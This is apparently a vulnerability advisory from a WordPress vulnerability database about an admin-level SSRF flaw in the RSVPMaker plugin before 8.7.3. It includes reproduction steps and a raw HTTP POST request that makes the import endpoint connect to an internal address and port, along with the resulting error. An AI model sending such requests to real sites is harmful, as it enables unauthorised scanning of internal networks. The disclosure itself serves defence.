Lucene search

K
wpexploitWpvulndbWPEX-ID:63BE225C-EBEE-4CAC-B43E-CF033EE7425D
HistoryJun 29, 2021 - 12:00 a.m.

RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

2021-06-2900:00:00
wpvulndb
158

The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes an URL input and calls curl on it, without first validating it to ensure it’s a remote one. As a result, a high privilege user could use that feature to scan the internal network via a SSRF attack.

Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import'

POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close

importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0


Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
Related for WPEX-ID:63BE225C-EBEE-4CAC-B43E-CF033EE7425D